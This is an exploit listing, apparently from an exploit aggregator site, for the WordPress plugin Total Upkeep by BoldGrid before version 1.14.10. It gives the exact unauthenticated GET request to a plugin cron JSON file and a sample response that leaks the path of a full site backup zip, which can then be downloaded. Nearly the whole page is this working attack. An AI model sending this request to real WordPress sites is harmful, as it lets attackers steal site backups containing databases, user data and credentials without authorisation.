Exploit for Total Upkeep by BoldGrid < 1.14.10 - Unauthenticated Backup Download

Name: Exploit for Total Upkeep by BoldGrid < 1.14.10 - Unauthenticated Backup Download
Rating: 5 (47 reviews)

2020-12-14 | CVSS 0.8

## https://sploitus.com/exploit?id=WPEX-ID:D35C19D9-8586-4C5B-9A01-44739CBEEE19
The filepath in /wp-content/plugins/boldgrid-backup/cron/restore-info.json will reveal the internal path of the backup file, which might be publicly accessible.

GET /wp-content/plugins/boldgrid-backup/cron/restore-info.json

{
    [...]
    "filepath":"/wp-content/boldgrid_backup_[RANDOM]/boldgrid-backup-www.example.com_wordpress-[RANDOM]-[DATE]-XXXXXX.zip"
    [...]
}